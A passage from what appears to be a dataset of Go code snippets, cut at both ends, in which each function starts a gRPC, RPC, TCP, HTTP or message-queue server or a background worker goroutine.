s.server.Serve(s.listener); err != nil {\n\t\t\tchErr <- err\n\t\t}\n\t}()\n\treturn chErr\n}", "func (w Worker) Start() {\n\tgo func() {\n\t\tfor {\n\t\t\t// register the current worker into the worker queue.\n\t\t\tw.WorkerPool <- w.JobChannel\n\n\t\t\tselect {\n\t\t\tcase job := <-w.JobChannel:\n\n\t\t\t\t// we have received a work request.\n\t\t\t\tlog.Println(job.payload.HealthCheck())\n\n\t\t\tcase <-w.QuitChan:\n\t\t\t\t// we have received a signal to stop\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func (w *worker) startWorker() {\n\tzap.L().Info(\"Starting InfluxDBworker\")\n\tfor {\n\t\tselect {\n\t\tcase event := <-w.events:\n\t\t\tw.processEvent(event)\n\t\tcase <-w.stop:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (g GrpcServer) Start() {\n\tgo func() {\n\t\tg.errCh <- g.server.Serve(g.listener)\n\t}()\n}", "func (tc *textileClient) start(ctx context.Context, cfg config.Config) error {\n\ttc.cfg = cfg\n\tauth := common.Credentials{}\n\tvar opts []grpc.DialOption\n\n\topts = append(opts, grpc.WithInsecure())\n\topts = append(opts, grpc.WithPerRPCCredentials(auth))\n\n\tvar threads *threadsClient.Client\n\tvar buckets *bucketsClient.Client\n\tvar netc *nc.Client\n\n\t// by default it goes to local threads now\n\thost := \"127.0.0.1:3006\"\n\n\tlog.Debug(\"Creating buckets client in \" + host)\n\tif b, err := bucketsClient.NewClient(host, opts...); err != nil {\n\t\tcmd.Fatal(err)\n\t} else {\n\t\tbuckets = b\n\t}\n\n\tlog.Debug(\"Creating threads client in \" + host)\n\tif t, err := threadsClient.NewClient(host, opts...); err != nil {\n\t\tcmd.Fatal(err)\n\t} else {\n\t\tthreads = t\n\t}\n\n\tif n, err := nc.NewClient(host, opts...); err != nil {\n\t\tcmd.Fatal(err)\n\t} else {\n\t\tnetc = n\n\t}\n\n\ttc.bucketsClient = buckets\n\ttc.threads = threads\n\ttc.netc = netc\n\n\ttc.isRunning = true\n\n\t// Attempt to connect to the Hub\n\t_, err := tc.getHubCtx(ctx)\n\tif err != nil {\n\t\tlog.Error(\"Could not connect to Textile Hub. Starting in offline mode.\", err)\n\t} else {\n\t\ttc.isConnectedToHub = true\n\t}\n\n\ttc.Ready <- true\n\treturn nil\n}", "func run(c context.Context, getCommands CommandFactory, daemonServices []DaemonService, sessionServices []trafficmgr.SessionService) error {\n\tcfg, err := client.LoadConfig(c)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to load config: %w\", err)\n\t}\n\tc = client.WithConfig(c, cfg)\n\tc = dgroup.WithGoroutineName(c, \"/\"+ProcessName)\n\tc, err = logging.InitContext(c, ProcessName, logging.RotateDaily, true)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Listen on domain unix domain socket or windows named pipe. The listener must be opened\n\t// before other tasks because the CLI client will only wait for a short period of time for\n\t// the socket/pipe to appear before it gives up.\n\tgrpcListener, err := client.ListenSocket(c, ProcessName, client.ConnectorSocketName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer func() {\n\t\t_ = client.RemoveSocket(grpcListener)\n\t}()\n\tdlog.Debug(c, \"Listener opened\")\n\n\tdlog.Info(c, \"---\")\n\tdlog.Infof(c, \"Telepresence %s %s starting...\", titleName, client.DisplayVersion())\n\tdlog.Infof(c, \"PID is %d\", os.Getpid())\n\tdlog.Info(c, \"\")\n\n\t// Don't bother calling 'conn.Close()', it should remain open until we shut down, and just\n\t// prefer to let the OS close it when we exit.\n\n\tsr := scout.NewReporter(c, \"connector\")\n\tcliio := &broadcastqueue.BroadcastQueue{}\n\n\ts := &service{\n\t\tscout: sr,\n\t\tconnectRequest: make(chan *rpc.ConnectRequest),\n\t\tconnectResponse: make(chan *rpc.ConnectInfo),\n\t\tmanagerProxy: trafficmgr.NewManagerProxy(),\n\t\tloginExecutor: auth.NewStandardLoginExecutor(cliio, sr),\n\t\tuserNotifications: func(ctx context.Context) <-chan string { return cliio.Subscribe(ctx) },\n\t\ttimedLogLevel: log.NewTimedLevel(cfg.LogLevels.UserDaemon.String(), log.SetLevel),\n\t\tgetCommands: getCommands,\n\t}\n\tif err := logging.LoadTimedLevelFromCache(c, s.timedLogLevel, s.procName); err != nil {\n\t\treturn err\n\t}\n\n\tg := dgroup.NewGroup(c, dgroup.GroupConfig{\n\t\tSoftShutdownTimeout: 2 * time.Second,\n\t\tEnableSignalHandling: true,\n\t\tShutdownOnNonError: true,\n\t})\n\n\tquitOnce := sync.Once{}\n\ts.quit = func() {\n\t\tquitOnce.Do(func() {\n\t\t\tg.Go(\"quit\", func(_ context.Context) error {\n\t\t\t\tcliio.Close()\n\t\t\t\treturn nil\n\t\t\t})\n\t\t})\n\t}\n\n\tg.Go(\"server-grpc\", func(c context.Context) (err error) {\n\t\topts := []grpc.ServerOption{}\n\t\tcfg := client.GetConfig(c)\n\t\tif !cfg.Grpc.MaxReceiveSize.IsZero() {\n\t\t\tif mz, ok := cfg.Grpc.MaxReceiveSize.AsInt64(); ok {\n\t\t\t\topts = append(opts, grpc.MaxRecvMsgSize(int(mz)))\n\t\t\t}\n\t\t}\n\t\ts.svc = grpc.NewServer(opts...)\n\t\trpc.RegisterConnectorServer(s.svc, s)\n\t\tmanager.RegisterManagerServer(s.svc, s.managerProxy)\n\t\tfor _, ds := range daemonServices {\n\t\t\tdlog.Infof(c, \"Starting additional daemon service %s\", ds.Name())\n\t\t\tif err := ds.Start(c, sr, s.svc, s.withSession); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\n\t\tsc := &dhttp.ServerConfig{Handler: s.svc}\n\t\tdlog.Info(c, \"gRPC server started\")\n\t\tif err = sc.Serve(c, grpcListener); err != nil && c.Err() != nil {\n\t\t\terr = nil // Normal shutdown\n\t\t}\n\t\tif err != nil {\n\t\t\tdlog.Errorf(c, \"gRPC server ended with: %v\", err)\n\t\t} else {\n\t\t\tdlog.Debug(c, \"gRPC server ended\")\n\t\t}\n\t\treturn err\n\t})\n\n\tg.Go(\"config-reload\", s.configReload)\n\tg.Go(\"session\", func(c context.Context) error {\n\t\treturn s.manageSessions(c, sessionServices)\n\t})\n\n\t// background-systema runs a localhost HTTP server for handling callbacks from the\n\t// Ambassador Cloud login flow.\n\tg.Go(\"background-systema\", s.loginExecutor.Worker)\n\n\t// background-metriton is the goroutine that handles all telemetry reports, so that calls to\n\t// metriton don't block the functional goroutines.\n\tg.Go(\"background-metriton\", s.scout.Run)\n\n\terr = g.Wait()\n\tif err != nil {\n\t\tdlog.Error(c, err)\n\t}\n\treturn err\n}", "func (s *Service) run() {\n\n\t// Create a communicator for sending and receiving packets.\n\tcommunicator := comm.NewCommunicator(s.config.PollInterval, s.config.Port)\n\tdefer communicator.Stop()\n\n\t// Create a ticker for sending pings.\n\tpingTicker := time.NewTicker(s.config.PingInterval)\n\tdefer pingTicker.Stop()\n\n\t// Create a ticker for timeout checks.\n\tpeerTicker := time.NewTicker(s.config.PeerTimeout)\n\tdefer peerTicker.Stop()\n\n\t// Create the packet that will be sent to all peers.\n\tpkt := &comm.Packet{\n\t\tID: s.config.ID,\n\t\tUserData: s.config.UserData,\n\t}\n\n\t// Continue processing events until explicitly stopped.\n\tfor {\n\t\tselect {\n\t\tcase p := <-communicator.PacketChan:\n\t\t\ts.processPacket(p)\n\t\tcase <-pingTicker.C:\n\t\t\tcommunicator.Send(pkt)\n\t\tcase <-peerTicker.C:\n\t\t\ts.processPeers()\n\t\tcase <-s.stopChan:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (s *JRPCServer) Start() {\n\thttpCall := s.httpSrv.On(s.endpointURL)\n\thttpCall.Forever()\n\thttpCall.handlerFunc = func(w http.ResponseWriter, req *http.Request) error {\n\t\t// ctx := context.Background()\n\t\ts.guard.Lock()\n\t\tdefer s.guard.Unlock()\n\t\tjReq := btcjson.Request{}\n\t\tbuf, err := ioutil.ReadAll(req.Body)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"unable to decode jRPC request: %v\", err)\n\t\t}\n\t\terr = req.Body.Close()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\treq.Body = ioutil.NopCloser(bytes.NewBuffer(buf))\n\t\tmustUnmarshal(buf, &jReq)\n\t\tcall, err := s.findCall(jReq)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// put unmarshalled JRPC request into a context\n\t\tctx := context.WithValue(req.Context(), jRPCRequestKey, jReq)\n\t\treturn call.execute(w, req.WithContext(ctx))\n\t}\n\ts.httpSrv.Start()\n}", "func Run() {\n\tgo listen()\n}", "func (s *GrpcServer) startGrpcService() {\n\t// Start listening for requests\n\treflection.Register(s.server)\n\tlogrus.Infof(\"%s gRPC Server ready on %s\", s.name, s.Address())\n\twaitForServer := make(chan bool)\n\ts.goServe(waitForServer)\n\t<-waitForServer\n\ts.running = true\n}", "func main() {\n\tflag.Parse()\n\tfmt.Println(\"start the program\")\n\t// fmt.Println(*serverAddr)\n\n\tfor {\n\t\t// start the app\n\t\twaitc := make(chan struct{}) // a wait lock\n\n\t\t// start the server thread\n\t\tgo func() {\n\t\t\tfmt.Println(\"start the server\")\n\t\t\tserver.InitFileServer()\n\t\t\tdefer close(waitc)\n\t\t}()\n\n\t\t// start the client thread\n\t\t// go func() {\n\t\t// \tfor {\n\t\t// \t\tmsg := <-msgc // a message to send\n\t\t// \t\tclient.InitChatClient(*myTitle, serverAddr)\n\n\t\t// \t\terr := client.Chat(msg)\n\t\t// \t\tif err != nil {\n\t\t// \t\t\t// restart the client\n\t\t// \t\t\tfmt.Printf(\"send Err: %v\", err)\n\t\t// \t\t}\n\t\t// \t}\n\t\t// }()\n\n\t\t// start the input thread\n\t\t// go input()\n\n\t\t<-waitc\n\t\t// finished in this round restart the app\n\t\tfmt.Println(\"restart the app\")\n\t}\n}", "func (w *Worker) Start() {\n\tw.commandsPipe = NewCommandPipe()\n\tw.responsesPipe = NewResponsePipe(w.maxResponsePipeBufferSize)\n\tvar err error\n\tw.cmd = exec.Command(w.commandName, w.args...)\n\tw.responsesPipe.Register(w.cmd)\n\tw.commandsPipe.Register(w.cmd)\n\n\tch := w.responsesPipe.Channel()\n\n\tgo func() {\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase data := <-ch:\n\t\t\t\tlog.Print(\"GOT FROM PIPE \", data)\n\t\t\t\tvar ans WorkerStatus\n\t\t\t\tvar err error\n\t\t\t\terr = json.Unmarshal([]byte(data), &ans)\n\t\t\t\tlog.Print(\"DECODED FROM PIPE: \", ans)\n\t\t\t\tif err != nil {\n\t\t\t\t\tans.TaskID = w.taskID\n\t\t\t\t\tans.worker = w\n\t\t\t\t\tans.Error = err.Error()\n\t\t\t\t\t// TODO\n\t\t\t\t\tlog.Print(\"ERROR: failed to parse worker response: \", err)\n\n\t\t\t\t} else {\n\t\t\t\t\tans.TaskID = w.taskID\n\t\t\t\t\tans.worker = w\n\t\t\t\t}\n\t\t\t\tw.lastEvent = ans\n\t\t\t\tw.workerEvent <- &ans\n\n\t\t\t}\n\t\t}\n\t}()\n\terr = w.cmd.Start()\n\tif err != nil {\n\t\tlog.Print(\"ERROR: \", err) // TODO\n\t}\n\tgo func() {\n\t\terr := w.cmd.Wait()\n\t\tif err != nil {\n\t\t\tswitch terr := err.(type) {\n\t\t\tcase *exec.ExitError:\n\t\t\t\tw.workerEvent <- &WorkerStatus{\n\t\t\t\t\tTaskID: w.taskID,\n\t\t\t\t\tworker: w,\n\t\t\t\t\tError: terr.Error(), // TODO\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\tw.workerEvent <- &WorkerStatus{\n\t\t\t\t\tTaskID: w.taskID,\n\t\t\t\t\tworker: w,\n\t\t\t\t\tError: err.Error(),\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}()\n\n}", "func main() {\n\tvar addr string\n\tflag.StringVar(&addr, \"e\", \":4040\", \"service address endpoint\")\n\tflag.Parse()\n\n\t// create local addr for socket\n\tladdr, err := net.ResolveTCPAddr(\"tcp\", addr)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\n\t// announce service using ListenTCP\n\t// which a TCPListener.\n\tl, err := net.ListenTCP(\"tcp\", laddr)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tos.Exit(1)\n\t}\n\tdefer l.Close()\n\tfmt.Println(\"listening at (tcp)\", laddr.String())\n\n\t// req/response loop\n\tfor {\n\t\t// use TCPListener to block and wait for TCP\n\t\t// connection request using AcceptTCP which creates a TCPConn\n\t\tconn, err := l.AcceptTCP()\n\t\tif err != nil {\n\t\t\tfmt.Println(\"failed to accept conn:\", err)\n\t\t\tconn.Close()\n\t\t\tcontinue\n\t\t}\n\t\tfmt.Println(\"connected to: \", conn.RemoteAddr())\n\n\t\tgo handleConnection(conn)\n\t}\n}", "func (w *rpcServer) Start() error {\n\treceiver, err := w.session.NewReceiver(\n\t\tamqp.LinkSourceAddress(queueAddress(w.queue)),\n\t\tamqp.LinkCredit(w.concurrency),\n\t\tamqp.LinkSourceDurability(amqp.DurabilityUnsettledState),\n\t\tamqp.LinkSourceExpiryPolicy(amqp.ExpiryNever),\n\t)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tw.stopping = false\n\tmessages := make(chan *amqp.Message)\n\n\tgo w.receiveMessages(receiver, messages)\n\tgo w.processIncomingMessage(messages)\n\n\treturn nil\n}", "func (e *Engine) syncRPC() {\n\t// TODO(jsing): Make this default to IPv6, if configured.\n\taddr := &net.TCPAddr{\n\t\tIP: e.config.Node.IPv4Addr,\n\t\tPort: e.config.SyncPort,\n\t}\n\tln, err := net.ListenTCP(\"tcp\", addr)\n\tif err != nil {\n\t\tlog.Fatalf(\"Listen failed: %v\", err)\n\t}\n\n\tgo e.syncServer.serve(ln)\n\n\t<-e.shutdownRPC\n\tln.Close()\n\te.shutdownRPC <- true\n}", "func callWorker(worker, name string, args interface{}, reply interface{}) bool {\n\treturn call(worker, \"RPCWorker.\"+name, args, reply)\n}", "func startPollWorker(site *ElectionSite) *pollWorker {\n\n\tworker := &pollWorker{site: site,\n\t\tballot: nil,\n\t\tkillch: make(chan bool, 1), // make sure sender won't block\n\t\tlistench: make(chan *Ballot, 1)} // make sure sender won't block\n\n\tgo worker.listen()\n\n\treturn worker\n}", "func main() {\n\tvar (\n\t\trepository = storage.NewInMemory()\n\t\tportServer = service.NewPortServer(repository)\n\t)\n\n\tlistener, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", port))\n\tif err != nil {\n\t\tlog.Fatalf(\"cannot start the server: %s\", err)\n\t}\n\n\tgrpcServer := grpc.NewServer()\n\n\tproto.RegisterStorageServer(grpcServer, portServer)\n\n\tlog.Printf(\"starting GRPC server on %s\", listener.Addr().String())\n\tif err := grpcServer.Serve(listener); err != nil {\n\t\tlog.Fatalf(\"failed to start the server: %s\", err)\n\t}\n}", "func (s *Service) Run(setupBody ServiceSetupCallback) error {\n\tif !atomic.CompareAndSwapInt32(&s.running, 0, 1) {\n\t\treturn ErrAlreadyRunning\n\t}\n\tdefer func() {\n\t\tatomic.StoreInt32(&s.running, 0)\n\t}()\n\n\ts.l.Lock()\n\tif s.stopped {\n\t\ts.l.Unlock()\n\t\treturn io.EOF\n\t}\n\ts.l.Unlock()\n\n\tconn, err := net.Dial(\"tcp\", s.url.Host)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\n\tconn.(*net.TCPConn).SetNoDelay(true)\n\n\treq, _ := http.NewRequest(\"RPCCONNECT\", s.url.String(), nil)\n\treq.SetBasicAuth(s.user, s.pwd)\n\treq.Header.Set(\"User-Agent\", userAgent)\n\terr = req.Write(conn)\n\tif err != nil {\n\t\treturn err\n\t}\n\tconnr := bufio.NewReader(conn)\n\trwc := &minirwc{Conn: conn, bufreader: connr}\n\tresp, err := http.ReadResponse(connr, req)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif resp.StatusCode != 200 {\n\t\tif resp.StatusCode == 401 {\n\t\t\treturn ErrRevRpcUnauthorized\n\t\t}\n\t\tvar message = \"\"\n\t\tif resp.StatusCode == 400 {\n\t\t\tbody, err := ioutil.ReadAll(resp.Body)\n\t\t\tif err == nil {\n\t\t\t\tmessage = string(body)\n\t\t\t}\n\t\t\tresp.Body.Close()\n\t\t}\n\t\treturn &HttpError{StatusCode: resp.StatusCode, Message: message}\n\t}\n\n\trpcServer := rpc.NewServer()\n\terr = setupBody(rpcServer)\n\trpcServer.RegisterName(\"revrpc\", &RevrpcSvc{service: s})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcodec := newJsonServerCodec(rwc)\n\n\ts.l.Lock()\n\tif s.stopped {\n\t\tcodec.Close()\n\t\ts.l.Unlock()\n\t\treturn io.EOF\n\t}\n\ts.codec = codec\n\ts.l.Unlock()\n\n\trpcServer.ServeCodec(codec)\n\n\treturn io.EOF\n}", "func Run() error {\n\tgo StartServer()\n\n\tlis, err := net.Listen(\"tcp\", \":50051\")\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\n\ts := grpc.NewServer()\n\n\tklessapi.RegisterKlessAPIServer(s, &apiserver.APIServer{})\n\tif err := s.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"failed to serve: %v\", err)\n\t}\n\treturn nil\n}", "func (w *worker) start() {\n\tgo func() {\n\t\tresult, err := w.resolve()\n\t\tfor req := range w.reqs {\n\t\t\treq.SetResult(result, err)\n\t\t}\n\t\tw.joinChan <- true\n\t}()\n}", "func startServer(config types.Config, v *Vibranium) *grpc.Server {\n\ts, err := net.Listen(\"tcp\", config.Bind)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\topts := []grpc.ServerOption{grpc.MaxConcurrentStreams(100)}\n\tgrpcServer := grpc.NewServer(opts...)\n\tpb.RegisterCoreRPCServer(grpcServer, v)\n\tgo grpcServer.Serve(s)\n\tlog.Info(\"Cluster started successfully.\")\n\treturn grpcServer\n}", "func main() {\n\tflag.Parse()\n\tfmt.Println(\"start the program\")\n\n\t// go myServer()\n\t// go myClient()\n\n\tfor {\n\t\t// start the app\n\t\twaitc := make(chan struct{}) // a wait lock\n\n\t\t// start the server thread\n\t\tgo func() {\n\t\t\tfmt.Println(\"start the server\")\n\t\t\tserver.InitFileServer()\n\t\t\tdefer close(waitc)\n\t\t}()\n\n\t\t// start the client thread\n\t\t// go func() {\n\t\t// \t// for {\n\t\t// \tserverAddr, server := filesource.SearchAddressForThefile(\"Liben.jpg\")\n\t\t// \tfmt.Println(*serverAddr)\n\t\t// \tfmt.Println(*server)\n\t\t// \tclient.InitFileClient(serverAddr, server)\n\t\t// \tclient.DownloadFile(\"Liben.jpg\")\n\t\t// \t// }\n\t\t// }()\n\n\t\t// start the input thread\n\t\t// go input()\n\n\t\t<-waitc\n\t\t// finished in this round restart the app\n\t\tfmt.Println(\"restart the app\")\n\t}\n}", "func main() {\n\tlis, err := net.Listen(\"tcp\", port)\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to listen on port [%s]: %v\", port, err)\n\t}\n\ts := grpc.NewServer()\n\tpb.RegisterColorGeneratorServer(s, &server{})\n\tif err := s.Serve(lis); err != nil {\n\t\tlog.Fatalf(\"Failed to start the server: %v\", err)\n\t}\n}", "func (m *Master) server() {\n\trpc.Register(m)\n\trpc.HandleHTTP()\n\tos.Create(\"mr-socket\")\n\n\tl, e := net.Listen(\"tcp\", \"0.0.0.0:8080\")\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tlog.Printf(\"Server is running at %s\\n\", l.Addr().String())\n\tgo http.Serve(l, nil)\n}", "func main() {\n\tport := os.Getenv(\"PORT\")\n\tlog.Printf(\"Starting a device model grpc service in port \" + port)\n\tlis, err := net.Listen(\"tcp\", \":\"+port)\n\n\tif err != nil {\n\t\tlog.Fatalf(\"faild to listen: %v\", err)\n\t}\n\tctn, err := registry.NewContainer()\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to build container: %v\", err)\n\t}\n\n\tserver := grpc.NewServer()\n\t// Start the device model service rpc\n\trpc.Apply(server, ctn)\n\n\tgo func() {\n\t\tlog.Printf(\"start grpc server port: %s\", port)\n\t\tserver.Serve(lis)\n\t}()\n\n\tquit := make(chan os.Signal)\n\tsignal.Notify(quit, os.Interrupt)\n\t<-quit\n\tlog.Println(\"stopping grpc server...\")\n\tserver.GracefulStop()\n\tctn.Clean()\n}", "func main() {\n initApplicationConfiguration()\n runtime.GOMAXPROCS(2) // in order for the rpc and http servers to work in parallel\n\n go servers.StartRPCServer()\n servers.StartHTTPServer()\n}", "func StartWorker(g handlers.Gwp) {\n\tapp.Logger(nil).Info(\"START\")\n\tfitchers, err := models.GetFetchers(app.API.DB)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tapp.Logger(nil).Info(\"URL: \", fitchers)\n\n\tfor _, fitcher := range fitchers {\n\t\tAddFetcher(fitcher.Id, fitcher.Url, fitcher.Interval)\n\t}\n\n}", "func RPC_Service() {\n\tapi := new(API)\n\terr := rpc.Register(api)\n\tif err != nil {\n\t\tlog.Fatal(\"error registering API\", err)\n\t}\n\trpc.HandleHTTP()\n\n\tlistener, err := net.Listen(\"tcp\", \"127.0.0.1:8080\")\n\n\tif err != nil {\n\t\tlog.Fatal(\"Listener error\", err)\n\t}\n\tlog.Printf(\"serving rpc on port %d\", 8080)\n\thttp.Serve(listener, nil)\n\n\tif err != nil {\n\t\tlog.Fatal(\"error serving: \", err)\n\t}\n}", "func main() {\n\tlogrus.SetFormatter(&logrus.TextFormatter{\n\t\tForceColors: true,\n\t\tFullTimestamp: true,\n\t})\n\tmlog := logrus.WithFields(logrus.Fields{\n\t\t\"component\": componentName,\n\t\t\"version\": env.Version(),\n\t})\n\n\tgrpc_logrus.ReplaceGrpcLogger(mlog.WithField(\"component\", componentName+\"_grpc\"))\n\tmlog.Infof(\"Starting %s\", componentName)\n\n\tgrpcServer, err := createGRPCServer(mlog)\n\tif err != nil {\n\t\tmlog.WithError(err).Fatal(\"failed to create grpc server\")\n\t}\n\t// Start go routines\n\tgo handleExitSignals(grpcServer, mlog)\n\tserveGRPC(env.ServiceAddr(), grpcServer, mlog)\n}", "func (server *RPCServer) Start() {\n\trpcServer := rpc.NewServer()\n\trpcServer.RegisterName(\"Server\", server.handler) //register the handler's methods as the server\n\n\thttpServer := &http.Server{}\n\thttpServer.Handler = rpcServer\n\n\tgo httpServer.Serve(server.listener)\n}", "func (s *Server) listen(listener net.Listener) {\n\tfor {\n\t\t// Accept a connection\n\t\tconn, err := listener.Accept()\n\t\tif err != nil {\n\t\t\tif s.shutdown {\n\t\t\t\treturn\n\t\t\t}\n\t\t\ts.logger.Printf(\"[ERR] consul.rpc: failed to accept RPC conn: %v\", err)\n\t\t\tcontinue\n\t\t}\n\n\t\tgo s.handleConn(conn, false)\n\t\tmetrics.IncrCounter([]string{\"rpc\", \"accept_conn\"}, 1)\n\t}\n}", "func (s *Server) startGRPC() {\n\tlistener, err := net.Listen(\"tcp\", s.grpcAddr)\n\tif err != nil {\n\t\tlog.Fatalf(\"Error creating listen socket: %v\", err)\n\t}\n\n\tgrpcServer := s.service.GRPCServer()\n\n\t// Set up graceful shutdown\n\tgo func() {\n\t\t<-s.ctx.Done()\n\t\tlog.Printf(\"Shutting down gRPC interface\")\n\t\tgrpcServer.GracefulStop()\n\t}()\n\n\t// Start gRPC server\n\tgo func() {\n\t\tlog.Printf(\"Starting gRPC at '%s'\", s.grpcAddr)\n\t\ts.grpcStarted.Done()\n\t\terr = grpcServer.Serve(listener)\n\t\tlog.Printf(\"Starting 2\")\n\n\t\tif err != nil {\n\t\t\tlog.Printf(\"gRPC interface returned error: %v\", err)\n\t\t}\n\t\tlog.Printf(\"gRPC interface: shut down\")\n\t\ts.grpcStopped.Done()\n\t}()\n\n}", "func main() {\n\n\tconst apiName = \"handle1\"\n\ttStr := `_` + I.ToS(time.Now().UnixNano())\n\tif len(os.Args) > 1 {\n\t\tapp := fiber.New()\n\n\t\tmode := os.Args[1]\n\t\tswitch mode {\n\t\tcase `apiserver`:\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\treturn c.SendString(I.ToS(rand.Int63()) + tStr)\n\t\t\t})\n\n\t\tcase `apiproxy`:\n\t\t\t// connect as request on request-reply\n\n\t\t\tconst N = 8\n\t\t\tcounter := uint32(0)\n\t\t\tncs := [N]*nats.Conn{}\n\t\t\tmutex := sync.Mutex{}\n\t\t\tconn := func() *nats.Conn {\n\t\t\t\tidx := atomic.AddUint32(&counter, 1) % N\n\t\t\t\tnc := ncs[idx]\n\t\t\t\tif nc != nil {\n\t\t\t\t\treturn nc\n\t\t\t\t}\n\t\t\t\tmutex.Lock()\n\t\t\t\tdefer mutex.Unlock()\n\t\t\t\tif ncs[idx] != nil {\n\t\t\t\t\treturn ncs[idx]\n\t\t\t\t}\n\t\t\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\t\t\tL.PanicIf(err, `nats.Connect`)\n\t\t\t\tncs[idx] = nc\n\t\t\t\treturn nc\n\t\t\t}\n\n\t\t\tdefer func() {\n\t\t\t\tfor _, nc := range ncs {\n\t\t\t\t\tif nc != nil {\n\t\t\t\t\t\tnc.Close()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}()\n\n\t\t\t// handler\n\t\t\tapp.Get(\"/\", func(c *fiber.Ctx) error {\n\t\t\t\tmsg, err := conn().Request(apiName, []byte(I.ToS(rand.Int63())), time.Second)\n\t\t\t\tif L.IsError(err, `nc.Request`) {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\t// Use the response\n\t\t\t\treturn c.SendString(string(msg.Data))\n\t\t\t})\n\t\tdefault:\n\t\t}\n\n\t\tlog.Println(mode + ` started ` + tStr)\n\t\tlog.Fatal(app.Listen(\":3000\"))\n\n\t} else {\n\t\t// worker\n\t\tlog.Println(`worker started ` + tStr)\n\n\t\tnc, err := nats.Connect(\"127.0.0.1\")\n\t\tL.PanicIf(err, `nats.Connect`)\n\t\tdefer nc.Close()\n\n\t\tconst queueName = `myqueue`\n\n\t\t//// connect as reply on request-reply (sync)\n\t\t//sub, err := nc.QueueSubscribeSync(apiName, queueName)\n\t\t//L.PanicIf(err, `nc.SubscribeSync`)\n\t\t//\n\t\t////Wait for a message\n\t\t//for {\n\t\t//\tmsg, err := sub.NextMsgWithContext(context.Background())\n\t\t//\tL.PanicIf(err, `sub.NextMsgWithContext`)\n\t\t//\n\t\t//\terr = msg.Respond([]byte(string(msg.Data) + tStr))\n\t\t//\tL.PanicIf(err, `msg.Respond`)\n\t\t//}\n\n\t\t//// channel (async) -- error slow consumer\n\t\t//ch := make(chan *nats.Msg, 1)\n\t\t//_, err = nc.ChanQueueSubscribe(apiName, queueName, ch)\n\t\t//L.PanicIf(err, `nc.ChanSubscribe`)\n\t\t//for {\n\t\t//\tselect {\n\t\t//\tcase msg := <-ch:\n\t\t//\t\tL.PanicIf(msg.Respond([]byte(string(msg.Data)+tStr)), `msg.Respond`)\n\t\t//\t}\n\t\t//}\n\n\t\t// callback (async)\n\t\t_, err = nc.QueueSubscribe(apiName, queueName, func(msg *nats.Msg) {\n\t\t\tres := string(msg.Data) + tStr\n\t\t\tL.PanicIf(msg.Respond([]byte(res)), `msg.Respond`)\n\t\t})\n\n\t\tvar line string\n\t\tfmt.Scanln(&line) // wait for input so not exit\n\t}\n}", "func listenClientRPCs() {\n\tkvServer := rpc.NewServer()\n\tkv := new(KVServer)\n\tkvServer.Register(kv)\n\tl, err := net.Listen(\"tcp\", listenClientIpPort)\n\tcheckError(\"Error in listenClientRPCs(), net.Listen()\", err, true)\n\tfmt.Println(\"Listening for client RPC calls on:\", listenClientIpPort)\n\tfor {\n\t\tconn, err := l.Accept()\n\t\tcheckError(\"Error in listenClientRPCs(), l.Accept()\", err, true)\n\t\tkvServer.ServeConn(conn)\n\t}\n}", "func (pr *Prober) start(ctx context.Context) {\n\t// Start the default server\n\tsrv := &http.Server{}\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tsrv.Close()\n\t}()\n\tgo func() {\n\t\tsrv.Serve(pr.serverListener)\n\t\tos.Exit(1)\n\t}()\n\n\tdataChan := make(chan *metrics.EventMetrics, 1000)\n\n\tgo func() {\n\t\tvar em *metrics.EventMetrics\n\t\tfor {\n\t\t\tem = <-dataChan\n\t\t\tvar s = em.String()\n\t\t\tif len(s) > logger.MaxLogEntrySize {\n\t\t\t\tglog.Warningf(\"Metric entry for timestamp %v dropped due to large size: %d\", em.Timestamp, len(s))\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Replicate the surfacer message to every surfacer we have\n\t\t\t// registered. Note that s.Write() is expected to be\n\t\t\t// non-blocking to avoid blocking of EventMetrics message\n\t\t\t// processing.\n\t\t\tfor _, surfacer := range pr.surfacers {\n\t\t\t\tsurfacer.Write(context.Background(), em)\n\t\t\t}\n\t\t}\n\t}()\n\n\t// Start a goroutine to export system variables\n\tgo sysvars.Start(ctx, dataChan, time.Millisecond*time.Duration(pr.c.GetSysvarsIntervalMsec()), pr.c.GetSysvarsEnvVar())\n\n\t// Start servers, each in its own goroutine\n\tfor _, s := range pr.Servers {\n\t\tgo s.Start(ctx, dataChan)\n\t}\n\n\t// Start RDS server if configured.\n\tif pr.rdsServer != nil {\n\t\tgo pr.rdsServer.Start(ctx, dataChan)\n\t}\n\n\t// Start RTC reporter if configured.\n\tif pr.rtcReporter != nil {\n\t\tgo pr.rtcReporter.Start(ctx)\n\t}\n\n\tif pr.c.GetDisableJitter() 